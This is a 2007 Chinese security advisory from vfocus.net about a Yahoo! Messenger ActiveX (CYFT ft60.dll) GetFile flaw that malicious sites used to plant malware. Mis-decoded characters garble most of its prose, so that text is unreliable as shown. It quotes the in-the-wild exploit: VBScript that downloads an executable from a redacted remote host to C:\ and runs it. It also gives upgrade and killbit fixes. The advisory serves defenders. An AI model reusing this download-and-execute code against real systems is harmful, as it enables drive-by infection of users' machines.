ÀûÓÃYahoo! Messenger 8.1.0 ActiveX¿Ø¼þGetFile·½Ê½ÈÎÒâÎļþÉÏ´«Â©¶´¹ÒÂíµÄ²¡¶¾ÒѾ³
|
À´Ô´£ºwww.vfocus.net ×÷Õߣºvfocus ·¢²¼Ê±¼ä£º2007-09-26
|
|
½ô¼±Ô¤¾¯£ºÀûÓÃYahoo! Messenger 8.1.0.421 CYFT ft60.dll ActiveX¿Ø¼þGetFile·½Ê½ÈÎÒâÎļþÉÏ´«Â©¶´¹ÒÂíµÄ²¡¶¾ÒѾ³öÏÖ£¡
´Ó¶ñÒâÍøÖ·¼ì²âµÄÏûÏ¢£¬·¢ÏÖÁËÒ»¸ö¶ñÒâÍøַʹÓÓÑÅ»¢Í¨CYFT ft60.dll ActiveX¿Ø¼þGetFile·½Ê½ÈÎÒâÎļþÉÏ´«Â©¶´”½øÐйÒÂí£¬ÔÙ´ÎÌáÐѹã´óÓû§¾¯Ì裬Ç뽫Yahoo! Messenger Éý¼¶µ½×îа汾£¬Ä¿Ç°¸ÃÈí¼þ×îа汾ΪÑÅ»¢Í¨8.3Õýʽ°æ¡£
¸Ã¶ñÒâÍøÖ·µÄEXP´úÂëÈçÏ£º
<pre> <object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object> <script language='vbscript'> test.GetFile "http://***.exe","c:\\***.exe",5,1,"tiany" Set WshShell = CreateObject("WScript.Shell") WshShell.Run"uu.exe" </script> </pre>
ÑÅ»¢Í¨µÄCYFT ActiveX¿Ø¼þʵÏÖÉÏ´æÔÚ©¶´£¬Ô¶³Ì¹¥»÷Õß¿ÉÄÜÀûÓôË©¶´ÏòÓû§ÏµÍ³ÉÏ´«ÈÎÒâÎļþ¡£CYFT ActiveX¿Ø¼þµÄGetFile()·½Ê½Ã»ÓжÔÓû§Ìá½»µÄ²ÎÊý×ö³ä·ÖµÄ¼ì²é¹ýÂË£¬Ô¶³Ì¹¥»÷Õß¿ÉÒÔͨ¹ýÌṩ»ûÐβÎÊýÏòÓû§ÏµÍ³µÄÈÎÒâλÖÃÉÏ´«ÈÎÒâÎļþ£¬µ«ÊÇÏà¹ØµÄ¿Ø¼þĬÈÏÇé¿öϲ»ÄÜÔ¶³Ìµ÷Óá£
¸Ã©¶´ÊÇÓÉshinnai £¨shinnai@autistici.org£©·¢Ïֵġ£
¸Ã©¶´ÔÚmilw0rmÉϵÄShellcode´úÂ룺Yahoo! Messenger 8.1.0.421 CYFT Object Arbitrary File Download
½â¾ö·½°¸£º
ÇëÏÂÔØ×îа汾µÄYahoo! Messenger £¬¹Ù·½ÏÂÔصØÖ·£ºhttp://cn.messenger.yahoo.com/
»òÕßÔÚ×¢²á±íÖÐÉèÖÃkillbit £º
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{24F3EAD6-8B87-4C1A-97DA-71C126BDA08F}] "Compatibility Flags"=dword:00000400
|
|
|
[ÍƼö]
[ÆÀÂÛ(0Ìõ)]
[·µ»Ø¶¥²¿] [´òÓ¡±¾Ò³]
[¹Ø±Õ´°¿Ú] |
|
|
|
|
|
|
ÍƼö¹ã¸æ |
|
|
|
|